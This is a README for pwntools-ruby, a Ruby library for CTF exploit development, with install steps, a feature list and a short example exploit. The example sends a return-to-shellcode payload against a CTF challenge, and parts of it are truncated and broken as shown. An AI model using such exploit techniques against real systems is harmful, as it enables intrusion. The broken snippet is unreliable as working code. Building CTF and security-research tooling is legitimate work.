GitHub stars GitHub issues Build Status Test Coverage Code Climate Inline docs MIT License Dependabot Status Rawsec's CyberSecurity Inventory


Always sad when playing CTF that there's nothing equivalent to pwntools in Python. While pwntools is awesome, I always love Ruby far more than Python... So this is an attempt to create such library.

Would try to have consistent naming with original pwntools, and do things in Ruby style.

Example Usage

Here's an exploitation for start which is a challenge on

# encoding: ASCII-8BIT
# The encoding line is important most time, or you'll get "\u0000" when using "\x00" in code,
# which is NOT what we want when doing pwn...

require 'pwn'

context.arch = 'i386'
context.log_level = :debug
z = '', 10000

z.recvuntil "Let's start the CTF:"
z.send p32(0x8048087).rjust(0x18, 'A')
stk = u32(z.recvuntil "\xff") "stack address: #{stk.hex}" # Log stack address

# Return to shellcode
addr = stk + 0x14
payload = addr.p32.rjust(0x18, 'A') + asm(
z.write payload

# Switch to interactive mode

More features and details can be found in the documentation.


Install the latest release:

gem install pwntools

Install from master branch:

git clone
cd pwntools-ruby
bundle install && bundle exec rake install


Some of the features (assembling/disassembling) require non-Ruby dependencies. Checkout the installation guide for keystone-engine and capstone-engine.

Or you are able to get running quickly with

# Install Capstone
sudo apt-get install libcapstone3

# Compile and install Keystone from source
sudo apt-get install cmake
git clone /tmp/keystone
cd /tmp/keystone
mkdir build
cd build
sudo make install

Supported Features


  • [x] i386
  • [x] amd64
  • [ ] arm
  • [ ] thumb


  • [x] context
  • [x] asm
  • [x] disasm
  • [x] shellcraft
  • [x] elf
  • [x] dynelf
  • [x] logger
  • [x] tube
    • [x] sock
    • [x] process
    • [x] serialtube
  • [ ] fmtstr
  • [x] util
    • [x] pack
    • [x] cyclic
    • [x] fiddling


git clone
cd pwntools-ruby
bundle exec rake

Note to irb users

irb defines main.context.

For the ease of exploit development in irb, that method would be removed if you use require 'pwn'.

You can still get the IRB::Context by irb_context.